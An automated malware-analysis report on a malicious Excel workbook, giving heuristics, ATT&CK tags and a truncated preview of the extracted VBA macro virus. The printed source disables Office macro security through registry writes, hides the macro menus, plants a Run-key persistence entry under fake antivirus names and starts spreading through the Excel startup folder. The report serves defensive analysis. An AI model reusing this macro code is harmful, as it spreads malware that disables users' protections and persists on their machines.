MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing heavily obfuscated VBA macros. The presence of Auto_Open and Auto_Close macros, along with CreateObject calls and obfuscated execution, strongly suggests a malicious loader. The script attempts to interact with the Windows Registry via ADVAPI32.DLL, indicating potential persistence or configuration manipulation. The overall behavior points to a macro-based downloader, likely delivered via spearphishing.
Heuristics 6
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32455 bytes |
SHA-256: 49caad8d313236108611ce640af1752b1a24ab8b27ef39d3c3ec9a755228012a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "enCryptionXLS"
' DO NOT EDIT THIS MACRO !!!
'
' Everything gonna be M4D , EXCEL@BÖMBER launch...
Private Declare Function RegOpenKeyExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "ADVAPI32.DLL" (ByVal hKey As Long) As Long
Global Const REG_DWORD As Long = 4
Global Const HKEY_LOCAL_MACHINE As Long = &H80000002
Global Const HKEY_CURRENT_USER As Long = &H80000001
Dim AA, BB, NN
Dim Myclub As String
Dim CrStat As Boolean
Dim pnm As String
Sub MessBoard()
ff = ActiveSheet.Index
Randomize
StarWidth = 15
StarHeight = 15
XDay = Day(Now())
For i = 1 To XDay
TopPos = Rnd() * (ActiveWindow.UsableHeight - StarHeight)
LeftPos = Rnd() * (ActiveWindow.UsableWidth - StarWidth)
Set NewStar = ActiveSheet.Shapes.AddShape _
(msoShape5pointStar, LeftPos, TopPos, StarWidth, StarHeight)
NewStar.Fill.ForeColor.SchemeColor = Int(Rnd() * 56)
Application.Wait Now + TimeValue("00:00:01")
DoEvents
Next i
Set myShapes = Worksheets(ff).Shapes
For Each shp In myShapes
If Left(shp.Name, 9) = "AutoShape" Then
shp.Delete
End If
Next
End Sub
Private Sub Auto_Open()
On Error Resume Next
Application.StatusBar = "Wait please...."
Application.ScreenUpdating = False
CommandBars("Tools").Controls("Customize...").Visible = False
CommandBars("Tools").Controls("Options...").Visible = False
CommandBars("Tools").Controls("Macro").Enable = False
Kill97 = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0, KEY_ALL_ACCESS, k)
Kill97 = RegSetValueExA(k, "Options6", 0, REG_DWORD, Chr$(0), 4)
Kill97 = RegCloseKey(k)
Kill2K = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\Microsoft\Office\9.0\Excel", 0, KEY_ALL_ACCESS, s)
Kill2K = RegSetValueExA(s, "Level", 0, 1, "1", 0)
Kill2K = RegCloseKey(s)
AnVrs = Array("VsStatEXE", "Norton Auto-Protect", "F-Secure", "PandaSoft", "AntiViral", "DrSolomon", "AntiVir", "MacroScan", "BombShellter")
Randomize
AVstr = AnVrs(Rnd * 9)
KillAV = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", 0, KEY_ALL_ACCESS, s)
KillAV = RegSetValueExA(s, AVstr, 0, 1, "c:\windows\rundll.exe", 0)
KillAV = RegCloseKey(s)
Application.DisplayAlerts = False
If Right(ActiveWorkbook.Name, 3) = "xlt" Then
ActiveWindow.Visible = False
Workbooks.Add
End If
XBrnd
strup = Application.StartupPath
If Dir(strup & "\" & "*.xlt") = "" Then
pnm = ActiveWorkbook.Name
Apnm = ActiveWorkbook.FullName
OtherVrs = Dir(strup & "\" & "*.xls")
If OtherVrs <> "" Then
Workbooks(OtherVrs).Close
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.